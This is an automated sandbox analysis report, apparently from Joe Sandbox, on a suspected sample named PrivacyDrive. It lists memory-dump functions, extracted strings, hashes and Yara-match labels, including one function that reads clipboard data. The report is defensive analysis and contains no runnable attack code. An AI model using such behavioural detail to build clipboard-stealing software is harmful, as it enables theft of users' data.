89>?, xrefs: 059DFC10
89&', xrefs: 059DFB55
twvy, xrefs: 059DFA46
`Y^_, xrefs: 059DFBB8
lonq, xrefs: 059DFA30
}e, xrefs: 059DF1DF
<=:;, xrefs: 059DFB4A
ho, xrefs: 059E0093
`cb,, xrefs: 059DFA0F
{9, xrefs: 059DF1D7
ti, xrefs: 059DF1F2

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: !"#m$()./$-./ $1{z}$89&'$89>?$9:;<$<=2$<=:;$J1$KJML$`Y^_$`cb,$ho$lonq$tuJK$twvy$ti${9$}e
API String ID: 0-3143562861
Opcode ID: 1be09d9b892bf5fb37b2706fae911b92a4d25a49ac9239da1be926b6d7972f45
Instruction ID: ce9faca23fa58e063965761136be36b10a754149bca8ca6f5ef69c9be465a880
Opcode Fuzzy Hash: 1be09d9b892bf5fb37b2706fae911b92a4d25a49ac9239da1be926b6d7972f45
Instruction Fuzzy Hash: 6CA288B16083819BE730CF14C885BAFBBE5FF85344F14881DE58A9B291DB759845CBA3

Function 059F82A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 059F82BD
GetWindowLongW.USER32 ref: 059F82F0
GetClipboardData.USER32 ref: 059F8300
GlobalLock.KERNEL32 ref: 059F8319
GlobalUnlock.KERNEL32 ref: 059F8401
CloseClipboard.USER32 ref: 059F8407

Strings

1, xrefs: 059F8372

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: 1
API String ID: 2832541153-2212294583
Opcode ID: e731187e031ee5b10bc49c58f04c1a6a38a0f23fce1137bf101fe2739295488c
Instruction ID: 84020befe143736f856940b1089096e4b6a64042068e28ff1f5f10a022a2c9a1
Opcode Fuzzy Hash: e731187e031ee5b10bc49c58f04c1a6a38a0f23fce1137bf101fe2739295488c
Instruction Fuzzy Hash: 7641D270918385CFCB50EBBC94483FEBFB1AB06220F040A28E5E1A72C1D7748546C763

Function 047D11B2 Relevance: 9.1, Strings: 7, Instructions: 390COMMON

Download Yara Rule

Strings

IK, xrefs: 047D130C
Ga!1, xrefs: 047D14FF
ZABC, xrefs: 047D131C
MSO, xrefs: 047D1314
6(>*, xrefs: 047D150F
=:li, xrefs: 047D1507
2$1., xrefs: 047D1545, 047D154D

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 2$1.$6(>*$=:li$Ga!1$ZABC$IK$MSO
API String ID: 0-2205979412
Opcode ID: 6f5fb733ebc5f304785a0cad369c011f03ff98ce4417e72d8a49ee95e203c399
Instruction ID: 55ab41ae69588d258f024eaa13809432fcbdf242dfea57f4568c326fd5ac8d53
Opcode Fuzzy Hash: 6f5fb733ebc5f304785a0cad369c011f03ff98ce4417e72d8a49ee95e203c399
Instruction Fuzzy Hash: FAD17AB061C3808BD311DF198890A2EBBF1EF96744F980D5CE4D19B352D736E949CBA6

Function 047EF577 Relevance: 9.0, Strings: 7, Instructions: 249COMMON

Download Yara Rule

Strings

Y9B?, xrefs: 047EF8F3
\)K/, xrefs: 047EF8D3
T1L7, xrefs: 047EF903
W%];, xrefs: 047EF8EB
L!Z', xrefs: 047EF8E3
45, xrefs: 047EF90B
M-_#, xrefs: 047EF8DB

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 45$L!Z'$M-_#$T1L7$W%];$Y9B?$\)K/
API String ID: 0-4037157281
Opcode ID: 000fa583c27e3bd1cf902c9d6b0d847f7fca54b88e81b478b20c270248eaddc6
Instruction ID: dd07f2c4c3fe4489a427dce62e5d5d4914e3314a72ccfd529746d3c1e1d582b0
Opcode Fuzzy Hash: 000fa583c27e3bd1cf902c9d6b0d847f7fca54b88e81b478b20c270248eaddc6
Instruction Fuzzy Hash: 68A122B0508381AFE310DF55E880A1EBBF4AB96744F500A1DF6D4AB2A1D375EA05CF67

Function 059EDB75 Relevance: 9.0, Strings: 7, Instructions: 249COMMON

Download Yara Rule

Strings

M-_#, xrefs: 059EDED9
T1L7, xrefs: 059EDF01
W%];, xrefs: 059EDEE9
45, xrefs: 059EDF09
L!Z', xrefs: 059EDEE1
\)K/, xrefs: 059EDED1
Y9B?, xrefs: 059EDEF1

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 45$L!Z'$M-_#$T1L7$W%];$Y9B?$\)K/
API String ID: 0-4037157281
Opcode ID: e762a077745ed3213fb73cf486d9be27ea190344dc24328fc24c5c39680eafbe
Instruction ID: 1a0de9bfbc196d8dfa09f03d1a31528bdb983d5accd83585da4e39cfd0c92f37
Opcode Fuzzy Hash: e762a077745ed3213fb73cf486d9be27ea190344dc24328fc24c5c39680eafbe
Instruction Fuzzy Hash: E7A112B4618381AFE310EF54E880A1EBBF4AB96784F500A1DF6D4AB261D371D905CF67

Function 047C2CB5 Relevance: 8.5, Strings: 6, Instructions: 960COMMON

Download Yara Rule

Strings

0, xrefs: 047C38F0
0, xrefs: 047C38C3
@, xrefs: 047C414B
i, xrefs: 047C44C7
0, xrefs: 047C3FA9
0, xrefs: 047C3949

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 0$0$0$0$@$i
API String ID: 0-1499800099
Opcode ID: bfdcd44171e054af30594285362d8ec87d0cf3f40a53c01fd1d8bb4925963302
Instruction ID: 99131d6e7018048c7fd278581824bb01b4971e3508eab96129aacd38a4504a2e
Opcode Fuzzy Hash: bfdcd44171e054af30594285362d8ec87d0cf3f40a53c01fd1d8bb4925963302
Instruction Fuzzy Hash: E572C071A083418FD718CF28C5A076ABBE1ABC9714F14C92DE8D997391E734E949CB92

Function 059C12B3 Relevance: 8.5, Strings: 6, Instructions: 960COMMON

Download Yara Rule

Strings

0, xrefs: 059C1EC1
0, xrefs: 059C1EEE
@, xrefs: 059C2749
0, xrefs: 059C1F47
0, xrefs: 059C25A7
i, xrefs: 059C2AC5

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 0$0$0$0$@$i
API String ID: 0-1499800099
Opcode ID: eae30ebb7c7f1c3672d3a48ce4f6b00b6e866ec84f385c6d4d492669278b0073
Instruction ID: bbd0e547c97752e316efded757279abc8a87837f93fdea533356203cd35b2594
Opcode Fuzzy Hash: eae30ebb7c7f1c3672d3a48ce4f6b00b6e866ec84f385c6d4d492669278b0073
Instruction Fuzzy Hash: 9172AC75A0C3428FD718CF28C59076ABBE2ABC9700F1489ADE4DA87391D734D905CB93

Function 059C1418 Relevance: 7.9, Strings: 6, Instructions: 444COMMON

Download Yara Rule

Strings

gfff, xrefs: 059C2178
gfff, xrefs: 059C2111
0123456789ABCDEFXP, xrefs: 059C1418
0123456789abcdefxp, xrefs: 059C1422
-, xrefs: 059C20BC
gfff, xrefs: 059C21C6

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-854689426
Opcode ID: 6fe934cf2cc5ebda9201e8881b3c2a776c544d1a3719b4b427724bccd2f35203
Instruction ID: a8b3d8021a4bf576739eab9002fedf78027de60a00446e673d66aead5aa547f5
Opcode Fuzzy Hash: 6fe934cf2cc5ebda9201e8881b3c2a776c544d1a3719b4b427724bccd2f35203
Instruction Fuzzy Hash: 7EF19F756087918FD718CF28C49076ABBE2BBC9300F088A6DE9D58B392D774D945DB83

Function 059C1359 Relevance: 7.8, Strings: 6, Instructions: 345COMMON

Download Yara Rule

Strings

gfff, xrefs: 059C230B
gfff, xrefs: 059C2371
0123456789ABCDEFXP, xrefs: 059C1359
gfff, xrefs: 059C2320
-, xrefs: 059C22D6
0123456789abcdefxp, xrefs: 059C1363

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-854689426
Opcode ID: 8c3747bfcd7f13c22651f041d62bd14ac4861aa08d1b69202ff76c9c6a959eef
Instruction ID: e395aa85bb3aaa2f1e6bb86f522894ba3b4014b5ddf89bdf1fd998c212a0c463
Opcode Fuzzy Hash: 8c3747bfcd7f13c22651f041d62bd14ac4861aa08d1b69202ff76c9c6a959eef
Instruction Fuzzy Hash: FFD1807560D3518FC718CF28C59066ABFE2AFD9304F088AADE8D987392D634D945CB93

Function 047C2E1A Relevance: 5.4, Strings: 4, Instructions: 444COMMON

Download Yara Rule

Strings

gfff, xrefs: 047C3BC8
gfff, xrefs: 047C3B7A
gfff, xrefs: 047C3B13
-, xrefs: 047C3ABE

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: -$gfff$gfff$gfff
API String ID: 0-3742897846
Opcode ID: afa2c59b7174b298cbdebdc209c61c00909c0ffdb9e6b4652cf0d3c2488a223f
Instruction ID: 270c6fe308a791f05ed90e8e976d7e31b3b0a4919980d756e0c41cd712fcb1af
Opcode Fuzzy Hash: afa2c59b7174b298cbdebdc209c61c00909c0ffdb9e6b4652cf0d3c2488a223f
Instruction Fuzzy Hash: 16F1B171A097518FD318CE29C49075ABBE2BBC9314F088A2DF9D59B385D734E945CB42

Function 047C2D5B Relevance: 5.3, Strings: 4, Instructions: 345COMMON

Download Yara Rule

Strings

-, xrefs: 047C3CD8
gfff, xrefs: 047C3D22
gfff, xrefs: 047C3D73
gfff, xrefs: 047C3D0D

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: -$gfff$gfff$gfff
API String ID: 0-3742897846
Opcode ID: 8d5eba57cc02c7181bcdba891e0a0af26107097a06c2f890a8e2723ddbbedac9
Instruction ID: a76580cb485ac7edcaae4919af2be88c3fc5f911ae020c69bc08b696f5fa5f44
Opcode Fuzzy Hash: 8d5eba57cc02c7181bcdba891e0a0af26107097a06c2f890a8e2723ddbbedac9
Instruction Fuzzy Hash: 38D1B37160D3918FC718CF29C59065AFBE2AFC9304F08CA6DE8D987386D634E945CB92

Function 047C2FB3 Relevance: 5.3, Strings: 4, Instructions: 343COMMON

Download Yara Rule

Strings

gfff, xrefs: 047C3BC8
gfff, xrefs: 047C3B7A
gfff, xrefs: 047C3B13
+, xrefs: 047C3AB7

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: +$gfff$gfff$gfff
API String ID: 0-2357821266
Opcode ID: 57560c12fcb4a5efa8ba590f06c0909563ef7215965b45d5facb10313411421f
Instruction ID: b13789c6d1c87731fc3c5481afd7c5e281a335e2f017573cfff82dba0394fb88
Opcode Fuzzy Hash: 57560c12fcb4a5efa8ba590f06c0909563ef7215965b45d5facb10313411421f
Instruction Fuzzy Hash: C6C19F71B087418FD718CE29C99076EBBE2ABC9310F088A3DF9959B385D774E905CB42

Function 059C15B1 Relevance: 5.3, Strings: 4, Instructions: 343COMMON

Download Yara Rule

Strings

gfff, xrefs: 059C2178
gfff, xrefs: 059C2111
+, xrefs: 059C20B5
gfff, xrefs: 059C21C6

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: +$gfff$gfff$gfff
API String ID: 0-2357821266
Opcode ID: 15e539dab44c400991c4e0784a673a923ff8519bbad4b6cf0f8befeb2d596ff8
Instruction ID: 7635687983f6faa8f3f7e870bbf9856d02832c94a47dd07b47845222bfd426f7
Opcode Fuzzy Hash: 15e539dab44c400991c4e0784a673a923ff8519bbad4b6cf0f8befeb2d596ff8
Instruction Fuzzy Hash: 09C19E75A087418FD718CF29C49076ABBE6BBC8300F088A6DE9D68B395D674D945CB83

Function 047C3A08 Relevance: 5.3, Strings: 4, Instructions: 280COMMON

Download Yara Rule

Strings

gfff, xrefs: 047C3BC8
gfff, xrefs: 047C3B7A
gfff, xrefs: 047C3B13
+, xrefs: 047C3AB7

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: +$gfff$gfff$gfff
API String ID: 0-2357821266
Opcode ID: 29f89fd07181678e07d233ffca9ef692ea22027e14ad50a671a1cb7e9ada4a94
Instruction ID: f82a8d30e9db2474a05ac429a6485394641f3cef13ab4519315d90a89483bd96
Opcode Fuzzy Hash: 29f89fd07181678e07d233ffca9ef692ea22027e14ad50a671a1cb7e9ada4a94
Instruction Fuzzy Hash: 76A1B071A097518FD718CE1DC9A025EBBE2ABC8300F088A2DF985DB346D734E945CB82

Function 059C2006 Relevance: 5.3, Strings: 4, Instructions: 280COMMON

Download Yara Rule

Strings

gfff, xrefs: 059C2178
gfff, xrefs: 059C2111
+, xrefs: 059C20B5
gfff, xrefs: 059C21C6

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: +$gfff$gfff$gfff
API String ID: 0-2357821266
Opcode ID: 29f89fd07181678e07d233ffca9ef692ea22027e14ad50a671a1cb7e9ada4a94
Instruction ID: 14015e190fb9e3d841d7aa412bf2f45bd86534d84fbd567e0b1d4d7c2175c794
Opcode Fuzzy Hash: 29f89fd07181678e07d233ffca9ef692ea22027e14ad50a671a1cb7e9ada4a94
Instruction Fuzzy Hash: 3BA19F75A097518FDB08CF1CC49066ABBE6ABC8700F088AADF9D5CB342D674D945CB93

Function 047CF4B2 Relevance: 5.2, Strings: 4, Instructions: 200COMMON

Download Yara Rule

Strings

_kQT, xrefs: 047CF5A9
a[[d, xrefs: 047CF5A1
@DvF, xrefs: 047CF5C1
1")&, xrefs: 047CF579

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 1")&$@DvF$_kQT$a[[d
API String ID: 0-276304770
Opcode ID: 120e7987c176392a5503b588ab93b9273890ba6732227fe43507c8885721f780
Instruction ID: 428409d850e993210b9d78c707698c0530c39e2394c353e39c086533d15350ae
Opcode Fuzzy Hash: 120e7987c176392a5503b588ab93b9273890ba6732227fe43507c8885721f780
Instruction Fuzzy Hash: C75136B410C3919FD302CF29C490A1ABFE2AB97744F18498DE4E55B392C33AD9098B67

Function 059CDAB0 Relevance: 5.2, Strings: 4, Instructions: 200COMMON

Download Yara Rule

Strings

1")&, xrefs: 059CDB77
@DvF, xrefs: 059CDBBF
_kQT, xrefs: 059CDBA7
a[[d, xrefs: 059CDB9F

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 1")&$@DvF$_kQT$a[[d
API String ID: 0-276304770
Opcode ID: 120e7987c176392a5503b588ab93b9273890ba6732227fe43507c8885721f780
Instruction ID: 85c336fbc531f0f9c47329323558a95ac5692d49138800015e74f2ccc5fae17c
Opcode Fuzzy Hash: 120e7987c176392a5503b588ab93b9273890ba6732227fe43507c8885721f780
Instruction Fuzzy Hash: 6B5146B414C3C19FD302CF298494A2BBFE6AF97244F18499CE4E54B342C3768909DBA7

Function 047D2911 Relevance: 5.2, Strings: 4, Instructions: 191COMMON

Download Yara Rule

Strings

,c'}, xrefs: 047D2C10
@3R, xrefs: 047D2BBC
6{6u, xrefs: 047D2C1E
{7@1, xrefs: 047D2BB5

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: ,c'}$6{6u$@3R${7@1
API String ID: 0-581628498
Opcode ID: d0a7b642b8c017893b6f45fbb6b48bc174d9839a4a6b9c085318be5e2dd8e902
Instruction ID: 269a649e921fcb4df16b09aea2471024b224423228fca2348608da763f16d4bf
Opcode Fuzzy Hash: d0a7b642b8c017893b6f45fbb6b48bc174d9839a4a6b9c085318be5e2dd8e902
Instruction Fuzzy Hash: 5FB1CDB4411B848FD3708F66C585B9ABBB0BB11704F508E4DD1EA6BB50D3B5A046CF9A

Function 059D0F0F Relevance: 5.2, Strings: 4, Instructions: 191COMMON

Download Yara Rule

Strings

@3R, xrefs: 059D11BA
{7@1, xrefs: 059D11B3
,c'}, xrefs: 059D120E
6{6u, xrefs: 059D121C

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: ,c'}$6{6u$@3R${7@1
API String ID: 0-581628498
Opcode ID: 10e18c92eb56fff570c3717abe2f511695b8f23ab69f37a44f1fd275c30a86bd
Instruction ID: ac86ccfaf6ecee2255dea8065de4365678630c8a34c0f29a662667f7184823f6
Opcode Fuzzy Hash: 10e18c92eb56fff570c3717abe2f511695b8f23ab69f37a44f1fd275c30a86bd
Instruction Fuzzy Hash: 67B1CCB4411B848FD3708F66C685B9BBFB0BB11604F508E0DE1EA6BA50D375A046CF9A

Function 047E5D92 Relevance: 5.2, Strings: 4, Instructions: 164COMMON

Download Yara Rule

Strings

OO, xrefs: 047E5DEC
J+*), xrefs: 047E5F41
4J, xrefs: 047E5DF3
VG, xrefs: 047E5DE5

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 4J$J+*)$OO$VG
API String ID: 0-160897490
Opcode ID: 0f994e25e501778185bac6c0785b33e44ab021523602a15f7da29192aebbcbaf
Instruction ID: 12e8d94867079086416ca80f66dda7be7bbd5314980ef8b685f9e369b805b1d5
Opcode Fuzzy Hash: 0f994e25e501778185bac6c0785b33e44ab021523602a15f7da29192aebbcbaf
Instruction Fuzzy Hash: 82519BB4901219EFCB10CFA9D984AAEBBB5FF19344B144658E854AF355E338E900CBA5

Function 059E4390 Relevance: 5.2, Strings: 4, Instructions: 164COMMON

Download Yara Rule

Strings

4J, xrefs: 059E43F1
OO, xrefs: 059E43EA
VG, xrefs: 059E43E3
J+*), xrefs: 059E453F

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 4J$J+*)$OO$VG
API String ID: 0-160897490
Opcode ID: bccc74ebf52906166519ded7b5486034297759ebd4095c55d9b164f537df30d1
Instruction ID: 6c506665758f8376bbcfee8395b1ca2a01bd8d60d512b125f623634418c5e680
Opcode Fuzzy Hash: bccc74ebf52906166519ded7b5486034297759ebd4095c55d9b164f537df30d1
Instruction Fuzzy Hash: 9351BAB4901215EFCF11CFA8D980AAEBBB5FF49344F145698E858AF345E338D900CBA5

Function 047F076F Relevance: 4.2, Strings: 3, Instructions: 482COMMON

Download Yara Rule

Strings

\^, xrefs: 047F0B70
4K, xrefs: 047F0B77
hG, xrefs: 047F0B7E

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 4K$\^$hG
API String ID: 0-2009946656
Opcode ID: a5e6a32877c141522707734bd5b541b15a4019426f9f919a8d2443720a02dc31
Instruction ID: d530c8b80051403ee5f9dd8615bfa1ae6e05dbadab5b05f42d044bef63b0d9ee
Opcode Fuzzy Hash: a5e6a32877c141522707734bd5b541b15a4019426f9f919a8d2443720a02dc31
Instruction Fuzzy Hash: 5F127BB4D002599FDB11DFA8C985AAEBBB1BF06300F544158E950BB386D734AA15CFF2

Function 059EED6D Relevance: 4.2, Strings: 3, Instructions: 482COMMON

Download Yara Rule

Strings

\^, xrefs: 059EF16E
4K, xrefs: 059EF175
hG, xrefs: 059EF17C

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 4K$\^$hG
API String ID: 0-2009946656
Opcode ID: 8c1d48e42570157e0a74a2881e0d8185cf856ff351fbbb52bec794922b08b696
Instruction ID: 1058302f2eae7eae8ed6400185faa360c3e920247eb52cce369ccaa475501dc6
Opcode Fuzzy Hash: 8c1d48e42570157e0a74a2881e0d8185cf856ff351fbbb52bec794922b08b696
Instruction Fuzzy Hash: BE1289B4D002599FDB11DFA8C681AAEBBB1BF06300F544159E854BB386C735AA15CFF2

Function 047CA252 Relevance: 4.1, Strings: 3, Instructions: 394COMMON

Download Yara Rule

Strings

IEND, xrefs: 047CA6A8
), xrefs: 047CA2D8
), xrefs: 047CA2CE

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: b5860f4443e222c91b742957b4d88ed1901d6d30d023abc19c03a61c700b1236
Instruction ID: 252589b67a4a207b4a2234ebfc710115e5fd766df52f8289cf5f5c70266ff8a8
Opcode Fuzzy Hash: b5860f4443e222c91b742957b4d88ed1901d6d30d023abc19c03a61c700b1236
Instruction Fuzzy Hash: A0E1C1B1A087459FE310CF28C88475ABBE0BF94304F14492DE999AB381E779F915CBD2

Function 059C8850 Relevance: 4.1, Strings: 3, Instructions: 394COMMON

Download Yara Rule

Strings

), xrefs: 059C88D6
IEND, xrefs: 059C8CA6
), xrefs: 059C88CC

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: 17fd6b88240b31442d73a51a42b0428ef8a67d64d6f0d3a3cccb811d382ead20
Instruction ID: 33f1a91cbcd04db6061c0b45336cde57bccee52d586d5812e183021b941d1096
Opcode Fuzzy Hash: 17fd6b88240b31442d73a51a42b0428ef8a67d64d6f0d3a3cccb811d382ead20
Instruction Fuzzy Hash: 28E1E0B1A08702AFE310CF28C88471ABFE5BB94314F144A6DE5999B381D775E915CBD3

Function 059F6970 Relevance: 4.0, Strings: 3, Instructions: 245COMMON

Download Yara Rule

Strings

00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 059F6A86
0, xrefs: 059F69ED
E, xrefs: 059F6B03

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 0$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$E
API String ID: 0-86108233
Opcode ID: 7d1cc5fb1ad50e1ed75d34c407731c230f7305e1ace7c7fe46af6ff092e51ac3
Instruction ID: fd077da8cb5c7eaff0efb2db5f89ced1c1209406bc1f3af83862c81c96be3278
Opcode Fuzzy Hash: 7d1cc5fb1ad50e1ed75d34c407731c230f7305e1ace7c7fe46af6ff092e51ac3
Instruction Fuzzy Hash: A8811A37A1D7904BC719CD3C8851379AF975BA6234F2D8B6DEAF54B3C2C529C8068361

Function 047F4215 Relevance: 4.0, Strings: 3, Instructions: 220COMMON

Download Yara Rule

Strings

`Pd#, xrefs: 047F4428
Ew@u, xrefs: 047F4518
a\bb, xrefs: 047F441E

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: Ew@u$`Pd#$a\bb
API String ID: 0-4211661383
Opcode ID: 97fcf0781c540df7bc95630f70ca0a892c4714cff3f8bdd37a8f63693cde1c8f
Instruction ID: 3a06fffa215896104938ffcfcbe8b7ee7e461c4fceeb49b0efcc4a87afa9721c
Opcode Fuzzy Hash: 97fcf0781c540df7bc95630f70ca0a892c4714cff3f8bdd37a8f63693cde1c8f
Instruction Fuzzy Hash: 55713670409B408AE7618F348894BE3BBE4BF2770AF44189CD5EA9B382D739B045DF55

Function 059F2813 Relevance: 4.0, Strings: 3, Instructions: 220COMMON

Download Yara Rule

Strings

`Pd#, xrefs: 059F2A26
a\bb, xrefs: 059F2A1C
Ew@u, xrefs: 059F2B16

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: Ew@u$`Pd#$a\bb
API String ID: 0-4211661383
Opcode ID: e2403f48be6ccd00aba2d5d3633d2eddfcdf4f7df174acd726a774b2f8e0ec7b
Instruction ID: 7248c00c44c599483a493247afb996da88c716059f54990664a61f2e592ac790
Opcode Fuzzy Hash: e2403f48be6ccd00aba2d5d3633d2eddfcdf4f7df174acd726a774b2f8e0ec7b
Instruction Fuzzy Hash: 22714874409B408ADB718F35C8A4BE3BBE5BF0A705F84189CD5EA9B282D739B045DF64

Function 047F429B Relevance: 4.0, Strings: 3, Instructions: 219COMMON

Download Yara Rule

Strings

`Pd#, xrefs: 047F4428
Ew@u, xrefs: 047F4518
a\bb, xrefs: 047F441E

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: Ew@u$`Pd#$a\bb
API String ID: 0-4211661383
